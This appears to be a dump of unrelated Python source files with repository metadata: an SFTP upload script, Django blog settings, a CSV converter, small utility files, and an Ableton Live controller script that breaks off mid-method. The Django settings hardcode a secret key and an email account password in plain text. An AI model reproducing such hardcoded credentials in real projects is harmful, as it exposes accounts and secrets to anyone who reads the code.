9a9dbd43fe8908039910579d0b92dd2c7dfb0bf7 | 5787c447443efebb0203b7a927ba519c3becc276 | /app.py | 5dc92fc99c63c00f46ce87b96dc43086a8f0a0ed | [] | no_license | Khanze99/app_with_connect_ftp | 793fed7b3fe9071a4807238a093c37c0ec141dfa | f08b31607eb7e5a99d332a9bd180e2743090dec9 | refs/heads/master | 2022-12-11T23:48:07.367465 | 2019-08-09T20:32:19 | 2019-08-09T20:32:19 | 201,040,161 | 0 | 0 | null | 2022-12-08T05:59:45 | 2019-08-07T11:51:14 | Python | UTF-8 | Python | false | false | 2,852 | py | from loguru import logger
import pysftp
import threading
import json
import time
CHECK = False
TURN_LIST = []
# logger.add('ftp_connect.log')
def parse_config(): # Парсим config
while True:
if len(TURN_LIST) == 0:
time.sleep(5)
        for item in list(TURN_LIST):  # iterate over a copy, since items are removed inside the loop
            try:
                with open(item, mode='r') as config:
                    # logger.debug("Read config")
                    data = json.load(config)
            except FileNotFoundError:
                # logger.debug("I can not find the config")
                TURN_LIST.remove(item)
                continue
            copy_local_to_server(**data)
            TURN_LIST.remove(item)
def copy_local_to_server(**data): # Copy to the server
host = data['host']
from_path = data['from_path']
to_path = data['to_path']
try:
valid_open = open(from_path, mode="r")
valid_open.close()
except FileNotFoundError:
# logger.debug("Can not find the file")
return False
try:
with pysftp.Connection(host=host, username=data['username'], password=data['password']) as ftp:
# logger.debug('Connect to {}'.format(host))
ftp.put(from_path, to_path)
except FileNotFoundError:
# logger.debug("Can not find path to save on the server")
with pysftp.Connection(host=host, username=data['username'], password=data['password']) as ftp:
# logger.debug('Connect to {}'.format(host))
# Если не находит директорию на сервере, создаем свою папку и туда сохраняем наши файлы
file = from_path.split('/')[-1]
ftp_dir = "ftp_files"
pwd = ftp.pwd + '/'
to_save = pwd+ftp_dir+'/'+file
list_dirs = ftp.listdir()
if ftp_dir not in list_dirs:
ftp.mkdir(ftp_dir)
ftp.put(from_path, to_save)
# logger.debug('Copy to server dir - {}\n'.format(to_save))
if __name__ == "__main__":
thread = threading.Thread(target=parse_config, name='thread 2')
thread.start()
while True: # Thread 1
if CHECK is False:
print("-----------------------------HELLO-------------------------------\n"
".................Enter the path to the config....................\n"
"...........--------------------------------------------..........\n"
".......................input /exit to exit ......................\n"
"...........--------------------------------------------..........")
CHECK = True
command = input('Enter the path to the config or input /exit: ')
if command == '/exit':
# logger.debug("Good bye :)")
break
else:
TURN_LIST.append(command)
| [
"[email protected]"
] | |
869c8034b50fb5e93d07d9fc12588eb7e36cbafa | 480839c83f12bf5f77c596327806f47a3095bd4d | /blogproject/blogproject/settings.py | d27330d783f45bdbf385cb145c402117d600dbb9 | [] | no_license | aanchaldjangoproject/django-blog-project | b19708afabac978dd1a1fd3de1fdee0b306a3b48 | 2dbe4df3b62f44368b5b97773320c088b4975526 | refs/heads/master | 2022-12-15T10:31:40.964395 | 2020-09-08T09:23:51 | 2020-09-08T09:23:51 | 293,762,976 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,483 | py | """
Django settings for blogproject project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
TEMPLATE_DIR = BASE_DIR / 'templates'
STATIC_DIR = BASE_DIR / 'static'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8fm8hzvg#n=nopp3$5zl(^a!+_9q(ze61!oi7ua&s+39w#vzk7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'taggit'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'blogproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blogproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
STATIC_DIR,
]
#SMPT MAIL Configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST='smtp.gmail.com'
EMAIL_PORT= 587
EMAIL_HOST_USER='[email protected]'
EMAIL_HOST_PASSWORD='aanchal123'
EMAIL_USE_TLS= True
TIME_ZONE = 'Asia/Kolkata'  # overrides the 'UTC' value assigned earlier in this file
| [
"[email protected]"
] | |
951b4442cabf4902c2af0e3992ca32fab9d49964 | 3a8ea5e69d3925919bc4d206f0480c35438d68d3 | /data/saves/txt2csv.py | 664339af044d7696f08a77876caa82df60d15267 | [] | no_license | TrellixVulnTeam/GTC_3DYA | 88d3e14a9d00b2571d3a8e15b9869b7f8ed9b844 | 93de95288dda2399cbfa532b3f65db2a1eaefbe9 | refs/heads/master | 2023-03-19T06:27:26.022402 | 2017-11-23T10:02:35 | 2017-11-23T10:02:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | #!/usr/bin/python3
import sys, os
open("csv.txt", "w").close()  # truncate/create csv.txt; portable, unlike "rm && touch" which fails when the file is missing
vars = ["objectX", "objectY", "targetPosY", "targetPosX", "targetMap", "currentMap", "animationDirection", \
"targetMapFile", "objectType"]
with open('csv.txt', 'a') as csv_file:
csv_file.write(str(vars).strip("[]").replace("'", "").replace(", ,", ", ")+'\n')
for i in range(0, len(vars)):
with open(vars[i], "r") as myfile:
exec(vars[i] + " = []")
data = myfile.readlines()
splitList = data[0].split(", ")
for j in range(0, len(splitList)):
            exec(vars[i] + ".append(splitList[j].rstrip())")  # eval("vars[i]") was a redundant indirection
print(eval(vars[i]))
csv = []
for i in range(0, 1000):
for j, file in enumerate(vars):
with open(file) as text:
contents = text.read().split(", ")
try:
csv.append(contents[i].strip("\n")+ ', ')
with open('csv.txt', 'a') as csv_file:
if j == len(vars)-1:
csv_file.write(str(csv).strip("[]").replace("'", "").replace(", ,", ", ")[:-2])
else:
csv_file.write(str(csv).strip("[]").replace("'", "").replace(", ,", ", "))
csv[:] = []
if j == len(vars)-1:
csv_file.write("\n")
except IndexError:
sys.exit()
| [
"[email protected]"
] | |
12ff067d4d973ce3a8d98caa49dc939608131064 | fe27c88ce233ecf196a6e24c02d962562b19a55a | /Elements/header.py | cce01cd924e64906bf61c1448bd573c8d31e6111 | [
"MIT"
] | permissive | shreyas/swalpa | d13221342b386cdfd12e4ecf48c6bcb46a258502 | 200c23a04e0a6a63b805705c9af15cec708b895a | refs/heads/master | 2016-08-09T07:17:29.615007 | 2016-03-31T17:45:20 | 2016-03-31T17:45:20 | 55,145,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | # Copyright (c) 2016 Shreyas Kulkarni ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from element import element
from utils.annotations import overrides
from navbar import navbar
class header(element):
@overrides(element)
def construct(self):
self.add_desired_parent_elements_chain(navbar) | [
"[email protected]"
] | |
d005c194336845c14e74887110e5e55f11382714 | c4e729edfb9b056b9aa111a31eebefe41f39ac46 | /cloudapi/missions/tasks/record.py | cdaa29e70197b7ab5078425b1145c8e0ecc396b8 | [] | no_license | sun3shines/web | 870a558538278ecb4a39e5d9cab4ba2ebb626ca3 | 9e6f83e6e793f86ecdf7202daae3903cc052f266 | refs/heads/master | 2021-01-18T23:49:48.722245 | 2016-07-02T10:25:24 | 2016-07-02T10:25:24 | 54,888,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
import json
from cloudapi.missions.tasks.task import Task
from cloudlib.urls.flask import strGetAtRecords,strGetOtRecords
class ObjectRecord(Task):
def __init__(self,atName,objPath):
self.atName = atName
self.objPath = objPath
def getUrl(self):
return strGetOtRecords
def getBody(self):
return json.dumps({'atName':self.atName,
'objPath':self.objPath})
class AccountRecord(Task):
def __init__(self,atName):
self.atName = atName
def getUrl(self):
return strGetAtRecords
def getBody(self):
return json.dumps({'atName':self.atName})
| [
"[email protected]"
] | |
f5af86d4e534bdc42ff4aaf9bb038cb6c056da23 | 546e6d8c3bb21695fc8794f8680444973e18bf2e | /posts/migrations/0007_remove_post_likes.py | 74af4ab9263e29aa1e4a57c2345028596d9cfd97 | [] | no_license | salma-osama/DataStructuresProject | e6af0f4da0d2a15ebc5d0c6ed1a9067402728bc5 | c2f7831e33984131e5969669af9cfd32e968f2de | refs/heads/master | 2020-03-15T05:29:01.502211 | 2018-05-03T17:52:25 | 2018-05-03T17:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # Generated by Django 2.0.4 on 2018-04-27 20:17
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0006_post_likes'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='likes',
),
]
| [
"[email protected]"
] | |
6fe735561a196c9ca6cb3a620e6f19a9433db701 | fe2c39fd6161ab009bfa52f28a6a31e3592c1011 | /src/pytorch_LSTM/pode-apagar-colab-20000-epocas/plot_csv.py | c92f68dbedda7404e732acf4cb01b15e4011b6a6 | [] | no_license | patrickctrf/ic-2019-2020-rnn-6d | 39fc35a385f51da251f2a6aaf3d74d0911c8c028 | bd352a879374db8882411f172b782beb2ea891c0 | refs/heads/master | 2022-08-10T11:31:16.114058 | 2020-10-09T01:36:06 | 2020-10-09T01:36:06 | 220,062,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # Load the Pandas libraries with alias 'pd'
import pandas as pd
# Read data from file 'filename.csv'
# (in the same directory that your python process is based)
# Control delimiters, rows, column names with read_csv (see later)
df = pd.read_csv("loss_log.csv")
# Preview the first 5 lines of the loaded data
print(df.head())
import matplotlib.pyplot as plt
plt.close()
# gca stands for 'get current axis'
ax = plt.gca()
df.plot(kind='line',x='epoch',y='training_loss',ax=ax)
df.plot(kind='line',x='epoch',y='val_loss', color='red', ax=ax)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['training_loss', 'val_loss'], loc='upper right')
plt.savefig("losses.png", dpi=400)
plt.show()
plt.close()
| [
"[email protected]"
] | |
8c8b7cf18508ad3e36b7fdd730f3943cec554af2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03474/s404356500.py | d4682971fa5faca714d2624ed46885f397b1c9bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | a,b = map(int,input().split())
s = input()
S = list(s)
c = 0
for i in S:
if i == "-":
c += 1
if c > 1:
print("No")
exit()
if s.isdecimal():
    print("No")
    exit()
if len(s) != a + b + 1:
print("No")
exit()
if s[:a].isdecimal() is True and S[a] == "-":
print("Yes")
else:
print("No") | [
"[email protected]"
] | |
48164e05697f12162b12e8aff4514bae824c3d8f | bbebd95ce007baf3be20ca14fc8fe696c4c7dd96 | /L9 Python Scripts/AumTroll_b995_9/AumTroll.py | 83d5019532316b29608ed862930eaf065731e895 | [] | no_license | spiralune/monomodular | 70eeabcb5a9921b7bab30d8c5fd45ca237cde9c3 | 862bb02067c2fbc9816795904b2537a9b5e1c7b6 | refs/heads/master | 2020-12-11T04:06:25.390424 | 2014-07-09T19:45:41 | 2014-07-09T19:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,373 | py | # by amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import time
import math
import sys
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button on the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scenes to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from _Framework.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from _Framework.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.SubjectSlot import subject_slot, subject_slot_group
"""Imports from the Monomodular Framework"""
from _Mono_Framework.CodecEncoderElement import CodecEncoderElement
from _Mono_Framework.EncoderMatrixElement import EncoderMatrixElement
from _Mono_Framework.MonoChopperComponent import MonoChopperComponent
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.ResetSendsComponent import ResetSendsComponent
from _Mono_Framework.DeviceSelectorComponent import DeviceSelectorComponent
from _Mono_Framework.DetailViewControllerComponent import DetailViewControllerComponent
from _Mono_Framework.MonomodComponent import MonomodComponent
from _Mono_Framework.MonoDeviceComponent import MonoDeviceComponent
from _Mono_Framework.LiveUtils import *
"""Custom files, overrides, and files from other scripts"""
from CNTRLR_9.Cntrlr import Cntrlr
from ModDevices import *
from Map import *
from _Tools.re import *
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
request_snapshot = (240, 0, 1, 97, 8, 7, 6, 247)
factoryreset = (240,0,1,97,8,6,247)
btn_channels = (240, 0, 1, 97, 8, 19, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, 0, 247);
enc_channels = (240, 0, 1, 97, 8, 20, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, CHANNEL, 247);
SLOWENCODER = (240, 0, 1, 97, 8, 30, 69, 00, 247)
NORMALENCODER = (240, 0, 1, 97, 8, 30, 00, 00, 247)
FASTENCODER = (240, 0, 1, 97, 8, 30, 04, 00, 247)
ENDCODER_BANK_CONTROL = [['ModDevice_knob0', 'ModDevice_knob1', 'ModDevice_knob2', 'ModDevice_knob3'], ['ModDevice_knob4', 'ModDevice_knob5', 'ModDevice_knob6', 'ModDevice_knob7']]
ENDCODER_BANKS = {'NoDevice':[ENDCODER_BANK_CONTROL[int(bank>3)] + ['CustomParameter_'+str(index+(bank*24)) for index in range(8)] for bank in range(8)]}
ALT_DEVICE_BANKS = {'EndCoders':ENDCODER_BANKS}
INITIAL_SCROLLING_DELAY = 5
INTERVAL_SCROLLING_DELAY = 1
class LoopPedalButtonElement(EncoderElement):
def __init__(self, *a, **k):
self._last = 0
super(LoopPedalButtonElement, self).__init__(*a, **k)
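	#receive_value gates the continuous pedal CC into a binary switch: values above 120 latch on (127), anything else reads as off (0)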
def receive_value(self, value):
self._verify_value(value)
value = int(value > 120)*127
self._last_sent_message = None
if value != self._last:
self.notify_value(value)
self._last = value
if self._report_input:
is_input = True
self._report_value(value, is_input)
class LoopPedalExpressionElement(EncoderElement):
def __init__(self, script, *a, **k):
self._last = 0
self._script = script
super(LoopPedalExpressionElement, self).__init__(*a, **k)
def receive_value(self, value):
self._verify_value(value)
if (value > self._last and (value - self._last) < 10) or (value < self._last and (self._last - value) < 10):
self.notify_value(value)
self._last = value
if self._report_input:
is_input = True
self._report_value(value, is_input)
else:
orig_value = value
value += int((value - self._last) > 0)*5
self.notify_value(value)
self._script.schedule_message(1, self.update_value, [orig_value, value])
self._last = value
def update_value(self, values):
if values[1] is self._last:
self.receive_value(values[0])
class AumTrollDeviceSelectorComponent(DeviceSelectorComponent):
def __init__(self, *a, **k):
super(AumTrollDeviceSelectorComponent, self).__init__(*a, **k)
self.song().add_appointed_device_listener(self._device_listener)
def disconnect(self, *a, **k):
super(AumTrollDeviceSelectorComponent, self).disconnect()
if self.song().appointed_device_has_listener(self._device_listener):
self.song().remove_appointed_device_listener(self._device_listener)
def set_matrix(self, matrix):
buttons = []
if not matrix is None:
for button, address in matrix.iterbuttons():
#self._script.log_message('button: ' + str(button))
button.use_default_message()
button.set_enabled(True)
buttons.append(button)
self.set_mode_buttons(tuple(buttons))
def set_mode_buttons(self, buttons):
#assert(isinstance(buttons, tuple) or buttons is None)
if buttons == None:
buttons = []
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
for button in buttons:
if not button is None:
button.add_value_listener(self._mode_value, identify_sender=True)
self._modes_buttons.append(button)
self._number_of_modes = len(self._modes_buttons) + self._offset
self.update()
def update(self):
if self.is_enabled():
name = 'None'
dev = self.song().appointed_device
if hasattr(dev, 'name'):
name = dev.name
dev_type = dev.type
dev_class = dev.class_name
if self._modes_buttons:
for index in range(len(self._modes_buttons)):
if match('p' + str(index+1) + ' ', name) != None:
val = (dev_class in DEVICE_COLORS and DEVICE_COLORS[dev_class]) or (dev_type in DEVICE_COLORS and DEVICE_COLORS[dev_type])
self._modes_buttons[index].send_value(val, True)
else:
self._modes_buttons[index].send_value(0, True)
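	#_update_mode scans every track, return track and the master for a device whose name begins with 'p<n> ', then appoints and selects that preset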
def _update_mode(self):
mode = self._modes_heap[-1][0]
assert(mode in range(self.number_of_modes()))
if self._mode_index != mode:
self._mode_index = mode
if self.is_enabled():
key = str('p' + str(self._mode_index + 1 + self._offset) + ' ')
preset = None
for track in self.song().tracks:
for device in self.enumerate_track_device(track):
if(match(key, str(device.name)) != None):
preset = device
break
for return_track in self.song().return_tracks:
for device in self.enumerate_track_device(return_track):
if(match(key, str(device.name)) != None):
preset = device
break
for device in self.enumerate_track_device(self.song().master_track):
if(match(key, str(device.name)) != None):
preset = device
break
if preset != None:
#self._script.log_message('preset found: ' + str(preset.name))
self._script.set_appointed_device(preset)
self.song().view.select_device(preset)
#self._last_preset = self._mode_index + self._offset
self.update()
def set_mode(self, mode):
self._clean_heap()
self._modes_heap = [(mode, None, None)]
self._update_mode()
def _device_listener(self, *a, **k):
if self.is_enabled():
self.update()
class AumTrollMonoDevice(MonoDeviceComponent):
def __init__(self, *a, **k):
super(AumTrollMonoDevice, self).__init__(*a, **k)
class AumTrollMonomodComponent(MonomodComponent):
def __init__(self, *a, **k):
super(AumTrollMonomodComponent, self).__init__(*a, **k)
self._alt_device_banks = MOD_TYPES
self._host_name = 'AumTroll'
"""for device in self._alt_device_banks.keys():
for Type in self._alt_device_banks[device].keys():
for bank in self._alt_device_banks[device][Type]:
self._script.log_message(bank)"""
def disconnect(self, *a, **k):
self._release_mod_dials()
super(AumTrollMonomodComponent, self).disconnect(*a, **k)
def connect_to_clients(self, *a, **k):
super(AumTrollMonomodComponent, self).connect_to_clients(*a, **k)
for index in range(4):
self._client[index]._mod_dial = (self._script._encoder[index]) #assign it a modDial so that we can control its modVolume from the unshifted CNTRLR
def _select_client(self, *a, **k):
super(AumTrollMonomodComponent, self)._select_client(*a, **k)
self._script.set_local_ring_control(self._active_client._c_local_ring_control)
self._script.set_absolute_mode(self._active_client._c_absolute_mode)
if not self._active_client._device_component == None:
self._active_client._device_component.update()
def _matrix_value(self, value, x, y, is_momentary): #to be sent to client from controller
assert (self._grid != None)
assert (value in range(128))
assert isinstance(is_momentary, type(False))
if (self.is_enabled()):
self._active_client._send_c_grid(x + self._x, y + self._y, value)
def _send_grid(self, *a):
pass
def _alt_value(self, value):
if self._shift_pressed == 0:
self._alt_pressed = value != 0
self._active_client._send('alt', int(self._alt_pressed))
self.update()
def _set_key_buttons(self, buttons):
#self._script.log_message('set key buttons ' + str(buttons))
assert (buttons == None) or (isinstance(buttons, tuple))
for key in self._keys:
if key.value_has_listener(self._key_value):
key.remove_value_listener(self._key_value)
self._keys = []
if buttons != None:
assert len(buttons) == 32
for button in buttons:
assert isinstance(button, MonoButtonElement)
self._keys.append(button)
button.add_value_listener(self._key_value, True)
def _key_value(self, value, sender):
if self.is_enabled():
self._active_client._send_c_key(self._keys.index(sender), int(value!=0))
def _update_keys(self):
for index in range(32):
self._send_c_key(index, self._active_client._c_key[index])
def _update_grid(self):
if self.is_enabled() and self._grid != None:
for column in range(self._grid.width()):
for row in range(self._grid.height()):
self._send_c_grid(column, row, self._active_client._c_grid[column][row])
def _send_key(self, *a):
pass
def _set_knobs(self, knobs):
assert (knobs == None) or (isinstance(knobs, tuple))
for knob in self._knobs:
if knob.has_value_listener(self._knob_value):
knob.remove_value_listener(self._knob_value)
self._knobs = []
if knobs != None:
assert len(knobs) == 24
for knob in knobs:
assert isinstance(knob, EncoderElement)
self._knobs.append(knob)
knob.add_value_listener(self._knob_value, True)
def _knob_value(self, value, sender):
if self.is_enabled():
self._active_client._send_c_knob(self._knobs.index(sender), value)
def on_enabled_changed(self, *a, **k):
super(AumTrollMonomodComponent, self).on_enabled_changed(*a, **k)
if self._active_client != None:
if self.is_enabled():
if not self._active_client._device_component is None:
self._active_client._device_component.update()
self._script.set_absolute_mode(self._active_client._c_absolute_mode)
self._script.set_local_ring_control(self._active_client._c_local_ring_control)
else:
for control in self._parameter_controls:
control.release_parameter()
self._script.set_absolute_mode(1)
self._script.set_local_ring_control(1)
def _dial_matrix_value(self, value, x, y):
if self.is_enabled() and self._active_client != None:
if self._script._absolute_mode == 0:
value = RELATIVE[int(value == 1)]
self._active_client._send_c_dial(x, y, value)
def _reset_encoder(self, coord):
self._dial_matrix.get_dial(coord[0], coord[1])._reset_to_center()
def _dial_button_matrix_value(self, value, x, y, force):
if (self.is_enabled()) and (self._active_client != None):
self._active_client._send_c_dial_button(x, y, value)
"""CNTRLR specific methods"""
def _send_c_grid(self, column, row, value): #to be sent to controller from client
if self.is_enabled() and self._grid != None:
if column in range(self._x, self._x + 4):
if row in range(self._y, self._y + 4):
self._grid.get_button(column - self._x, row - self._y).send_value(int(self._colors[value]))
def _send_c_key(self, index, value):
if self.is_enabled():
#if (self._shift_pressed > 0) or (self._locked > 0):
# self._grid.get_button(index, 7).send_value(int(self._colors[value]))
if self._keys != None and len(self._keys) > index:
self._keys[index].send_value(int(self._colors[value]))
def _send_c_wheel(self, column, row, wheel, parameter=None): #to be sent to controller from client
if self.is_enabled() and wheel != None:
if column < 4 and row < 3:
dial = self._dial_matrix.get_dial(column, row)
if(parameter=='value'):
dial._ring_value = int(wheel['value'])
dial._ring_mode = int(wheel['mode'])
dial._ring_green = int(wheel['green']!=0)
dial._ring_log = int(wheel['log'])
if(parameter=='custom'):
dial._ring_custom = dial._calculate_custom(str(wheel['custom']))
self._dial_button_matrix.send_value(column, row, wheel['white'])
if(self._script._absolute_mode > 0) and (not self._active_client._device_component.is_enabled()):
dial.send_value(wheel['log'], True)
def _update_c_wheel(self):
if self._dial_button_matrix != None:
for column in range(4):
for row in range(3):
self._send_c_wheel(column, row, self._active_client._c_wheel[column][row])
if not self._active_client._device_component.is_enabled():
self._send_to_lcd(column, row, self._active_client._c_wheel[column][row])
#self._script.log_message('dial value update' +str(column) + str(row) + str(self._active_client._wheel[column][row]['value']))
def _update_wheel(self):
self._update_c_wheel()
def set_c_local_ring_control(self, val = 1):
self._c_local_ring_control = (val!=0)
self._script.set_local_ring_control(self._c_local_ring_control)
def set_c_absolute_mode(self, val=1):
self._c_absolute_mode = (val!=0)
self._script.set_absolute_mode(self._c_absolute_mode)
def _release_mod_dials(self):
if not self._client is None:
for client in self._client: #for each of our 4 clients:
if not client._mod_dial == None: #if the client has a modDial assigned to it
#self._script.log_message('mod dial release ' + str(client))
client._mod_dial.release_parameter() #remove the modDial's parameter assignment
def _assign_mod_dials(self):
if not self._client is None:
for client in self._client: #recursion to contain all available clients
param = client._mod_dial_parameter() #param is a local variable, and we assign its value to the mod_dial_parameter (this is handled by each individual client module)
#self._script.log_message('mod dial param ' + str(param))
if not client._mod_dial == None: #if the client has been assigned a mod dial (which it should have been in setup_mod() )
if not param == None: #if the param variable was properly assigned in the client module
client._mod_dial.connect_to(param) #connect the physical control to the parameter (this should be the moddial parameter in the m4l patch)
else:
client._mod_dial.release_parameter() #if the param was None, release the physical control from any assignments
self._script.request_rebuild_midi_map()
def _display_mod_colors(self):
if not self._client is None:
for index in range(4): #set up a recursion of 4
self._script._shift_mode._modes_buttons[index].send_value(self._client[index]._mod_color) #update the modLEDs to display the color assigned to its contained mod
if self._is_enabled:
self._script._shift_mode._modes_buttons[self._client.index(self._active_client)].send_value(8)
else:
for index in range(4):
self._script._shift_mode._modes_buttons[index].send_value(0)
def _send_nav_box(self):
pass
class ShiftModeComponent(ModeSelectorComponent):
__module__ = __name__
	__doc__ = " Special Class that selects mode 0 if a mode button that's active is pressed"
def __init__(self, script, callback, *a, **k):
super(ShiftModeComponent, self).__init__(*a, **k)
self._script = script
self.update = callback
self._modes_buttons = []
self._last_mode = 0
self._set_protected_mode_index(0)
def set_mode_buttons(self, buttons):
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
if (buttons != None):
for button in buttons:
